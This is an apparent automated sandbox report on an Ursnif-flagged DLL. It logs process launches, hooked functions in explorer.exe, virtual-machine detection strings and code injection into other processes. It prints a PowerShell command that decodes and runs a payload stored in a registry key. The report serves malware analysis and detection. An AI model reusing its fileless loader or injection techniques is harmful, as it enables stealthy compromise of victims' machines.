        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01385BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: out.dllStatic PE information: section name: .data2
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002193 push ecx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002140 push ecx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8E6BE push esp; retf
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8AC00 push ecx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8E1AF push ebx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8E163 push edx; iretd
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8AF33 push ecx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FBBAD0 push edx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB3C54 push eax; iretd
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB3C32 push eax; iretd
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB197F push ds; retf
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB5EB0 push 0E0634C7h; retf
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB16B6 push ecx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB52B6 push esp; iretd
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB3205 push cs; retf
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB3FFB pushad ; iretd
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FB33A6 push ds; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A7177 push ecx; ret
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A6E10 push ecx; ret
        Source: C:\Windows\explorer.exeCode function: 32_2_04E0C131 push 3B000001h; retf
        Source: C:\Windows\System32\control.exeCode function: 33_2_00AFC131 push 3B000001h; retf
        Source: C:\Windows\System32\rundll32.exeCode function: 36_2_000002067577C131 push 3B000001h; retf
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
        Hooks registry keys query functions (used to hide registry keys)Show sources
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
        Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
        Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
        Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
        Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
        Modifies the prolog of user mode functions (user mode inline hooks)Show sources
        Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
        Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3102
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5790
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F87DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEB9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013905EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
        Source: explorer.exe, 00000020.00000000.563167011.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000020.00000000.563117443.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
        Source: explorer.exe, 00000020.00000000.558190996.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000020.00000000.563117443.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
        Source: RuntimeBroker.exe, 00000023.00000002.708021051.0000021DB5A53000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000020.00000000.558190996.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000020.00000000.562859337.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
        Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000020.00000000.562859337.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: explorer.exe, 00000020.00000000.563167011.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
        Source: explorer.exe, 00000020.00000002.707268029.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
        Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01385BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
        Source: C:\Windows\System32\loaddll32.exeMemory protected: page execute read | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\System32\control.exe base: B90000 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21912DC0000 protect: page execute and read and write
        Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 20675470000 protect: page execute and read and write
        Changes memory attributes in foreign processes to executable or writableShow sources
        Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
        Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
        Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute read
        Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
